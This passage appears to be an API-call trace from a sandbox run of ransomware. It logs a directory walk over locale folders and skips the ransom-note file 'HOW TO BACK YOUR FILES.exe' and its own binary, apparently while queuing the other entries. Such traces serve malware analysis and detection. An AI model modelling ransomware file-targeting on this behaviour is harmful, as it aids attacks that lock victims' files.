nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da_DK", cAlternateFileName="")) returned 1 [0152.176] lstrcmpiW (lpString1="da_DK", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.176] lstrcmpiW (lpString1="da_DK", lpString2="aoldtz.exe") returned 1 [0152.176] lstrcpyW (in: lpString1=0x2cce464, lpString2="da_DK" | out: lpString1="da_DK") returned="da_DK" [0152.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0152.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4800 [0152.177] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0152.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de_DE", cAlternateFileName="")) returned 1 [0152.177] lstrcmpiW (lpString1="de_DE", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.177] lstrcmpiW (lpString1="de_DE", lpString2="aoldtz.exe") returned 1 [0152.177] lstrcpyW (in: lpString1=0x2cce464, lpString2="de_DE" | out: lpString1="de_DE") returned="de_DE" [0152.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0152.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4878 [0152.177] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0152.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_US", cAlternateFileName="")) returned 1 [0152.177] lstrcmpiW (lpString1="en_US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.177] lstrcmpiW (lpString1="en_US", lpString2="aoldtz.exe") returned 1 [0152.177] lstrcpyW (in: lpString1=0x2cce464, lpString2="en_US" | out: lpString1="en_US") returned="en_US" [0152.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0152.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e48f0 [0152.177] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0152.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es_ES", cAlternateFileName="")) returned 1 [0152.177] lstrcmpiW (lpString1="es_ES", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.177] lstrcmpiW (lpString1="es_ES", lpString2="aoldtz.exe") returned 1 [0152.178] lstrcpyW (in: lpString1=0x2cce464, lpString2="es_ES" | out: lpString1="es_ES") returned="es_ES" [0152.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0152.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4968 [0152.178] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0152.178] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eu_ES", cAlternateFileName="")) returned 1 [0152.178] lstrcmpiW (lpString1="eu_ES", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.178] lstrcmpiW (lpString1="eu_ES", lpString2="aoldtz.exe") returned 1 [0152.178] lstrcpyW (in: lpString1=0x2cce464, lpString2="eu_ES" | out: lpString1="eu_ES") returned="eu_ES" [0152.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0152.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e49e0 [0152.178] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0152.178] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a1a980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a1a980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi_FI", cAlternateFileName="")) returned 1 [0152.178] lstrcmpiW (lpString1="fi_FI", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.178] lstrcmpiW (lpString1="fi_FI", lpString2="aoldtz.exe") returned 1 [0152.178] lstrcpyW (in: lpString1=0x2cce464, lpString2="fi_FI" | out: lpString1="fi_FI") returned="fi_FI" [0152.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0152.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4a58 [0152.178] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0152.178] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a1a980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a1a980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr_FR", cAlternateFileName="")) returned 1 [0152.179] lstrcmpiW (lpString1="fr_FR", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.179] lstrcmpiW (lpString1="fr_FR", lpString2="aoldtz.exe") returned 1 [0152.179] lstrcpyW (in: lpString1=0x2cce464, lpString2="fr_FR" | out: lpString1="fr_FR") returned="fr_FR" [0152.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0152.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4ad0 [0152.179] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0152.179] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5390ffe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0152.179] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0152.179] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hr_HR", cAlternateFileName="")) returned 1 [0152.179] lstrcmpiW (lpString1="hr_HR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.179] lstrcmpiW (lpString1="hr_HR", lpString2="aoldtz.exe") returned 1 [0152.179] lstrcpyW (in: lpString1=0x2cce464, lpString2="hr_HR" | out: lpString1="hr_HR") returned="hr_HR" [0152.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0152.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4b48 [0152.179] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0152.179] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu_HU", cAlternateFileName="")) returned 1 [0152.179] lstrcmpiW (lpString1="hu_HU", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.179] lstrcmpiW (lpString1="hu_HU", lpString2="aoldtz.exe") returned 1 [0152.180] lstrcpyW (in: lpString1=0x2cce464, lpString2="hu_HU" | out: lpString1="hu_HU") returned="hu_HU" [0152.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0152.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4bc0 [0152.180] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0152.180] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it_IT", cAlternateFileName="")) returned 1 [0152.180] lstrcmpiW (lpString1="it_IT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.180] lstrcmpiW (lpString1="it_IT", lpString2="aoldtz.exe") returned 1 [0152.180] lstrcpyW (in: lpString1=0x2cce464, lpString2="it_IT" | out: lpString1="it_IT") returned="it_IT" [0152.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0152.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4c38 [0152.180] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0152.180] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja_JP", cAlternateFileName="")) returned 1 [0152.180] lstrcmpiW (lpString1="ja_JP", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.180] lstrcmpiW (lpString1="ja_JP", lpString2="aoldtz.exe") returned 1 [0152.180] lstrcpyW (in: lpString1=0x2cce464, lpString2="ja_JP" | out: lpString1="ja_JP") returned="ja_JP" [0152.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0152.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4cb0 [0152.180] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0152.180] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko_KR", cAlternateFileName="")) returned 1 [0152.180] lstrcmpiW (lpString1="ko_KR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.181] lstrcmpiW (lpString1="ko_KR", lpString2="aoldtz.exe") returned 1 [0152.181] lstrcpyW (in: lpString1=0x2cce464, lpString2="ko_KR" | out: lpString1="ko_KR") returned="ko_KR" [0152.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0152.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4d28 [0152.181] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0152.181] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb_NO", cAlternateFileName="")) returned 1 [0152.181] lstrcmpiW (lpString1="nb_NO", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.181] lstrcmpiW (lpString1="nb_NO", lpString2="aoldtz.exe") returned 1 [0152.181] lstrcpyW (in: lpString1=0x2cce464, lpString2="nb_NO" | out: lpString1="nb_NO") returned="nb_NO" [0152.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0152.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4da0 [0152.181] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0152.181] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl_NL", cAlternateFileName="")) returned 1 [0152.181] lstrcmpiW (lpString1="nl_NL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.181] lstrcmpiW (lpString1="nl_NL", lpString2="aoldtz.exe") returned 1 [0152.181] lstrcpyW (in: lpString1=0x2cce464, lpString2="nl_NL" | out: lpString1="nl_NL") returned="nl_NL" [0152.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0152.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4e18 [0152.182] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0152.182] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl_PL", cAlternateFileName="")) returned 1 [0152.182] lstrcmpiW (lpString1="pl_PL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.182] lstrcmpiW (lpString1="pl_PL", lpString2="aoldtz.exe") returned 1 [0152.182] lstrcpyW (in: lpString1=0x2cce464, lpString2="pl_PL" | out: lpString1="pl_PL") returned="pl_PL" [0152.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0152.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4e90 [0152.182] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0152.182] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0152.182] lstrcmpiW (lpString1="pt_BR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.182] lstrcmpiW (lpString1="pt_BR", lpString2="aoldtz.exe") returned 1 [0152.182] lstrcpyW (in: lpString1=0x2cce464, lpString2="pt_BR" | out: lpString1="pt_BR") returned="pt_BR" [0152.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0152.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4f08 [0152.182] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0152.182] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ro_RO", cAlternateFileName="")) returned 1 [0152.182] lstrcmpiW (lpString1="ro_RO", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.182] lstrcmpiW (lpString1="ro_RO", lpString2="aoldtz.exe") returned 1 [0152.183] lstrcpyW (in: lpString1=0x2cce464, lpString2="ro_RO" | out: lpString1="ro_RO") returned="ro_RO" [0152.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0152.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4f80 [0152.183] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0152.183] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru_RU", cAlternateFileName="")) returned 1 [0152.183] lstrcmpiW (lpString1="ru_RU", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.183] lstrcmpiW (lpString1="ru_RU", lpString2="aoldtz.exe") returned 1 [0152.183] lstrcpyW (in: lpString1=0x2cce464, lpString2="ru_RU" | out: lpString1="ru_RU") returned="ru_RU" [0152.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0152.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4ff8 [0152.183] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0152.183] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sk_SK", cAlternateFileName="")) returned 1 [0152.183] lstrcmpiW (lpString1="sk_SK", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.183] lstrcmpiW (lpString1="sk_SK", lpString2="aoldtz.exe") returned 1 [0152.183] lstrcpyW (in: lpString1=0x2cce464, lpString2="sk_SK" | out: lpString1="sk_SK") returned="sk_SK" [0152.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0152.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e5070 [0152.183] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0152.183] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5395c2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5395c2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sl_SI", cAlternateFileName="")) returned 1 [0152.184] lstrcmpiW (lpString1="sl_SI", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.184] lstrcmpiW (lpString1="sl_SI", lpString2="aoldtz.exe") returned 1 [0152.184] lstrcpyW (in: lpString1=0x2cce464, lpString2="sl_SI" | out: lpString1="sl_SI") returned="sl_SI" [0152.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0152.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e50e8 [0152.184] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0152.184] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5395c2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5395c2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv_SE", cAlternateFileName="")) returned 1 [0152.184] lstrcmpiW (lpString1="sv_SE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.184] lstrcmpiW (lpString1="sv_SE", lpString2="aoldtz.exe") returned 1 [0152.184] lstrcpyW (in: lpString1=0x2cce464, lpString2="sv_SE" | out: lpString1="sv_SE") returned="sv_SE" [0152.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0152.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e5160 [0152.184] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0152.184] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr_TR", cAlternateFileName="")) returned 1 [0152.184] lstrcmpiW (lpString1="tr_TR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.184] lstrcmpiW (lpString1="tr_TR", 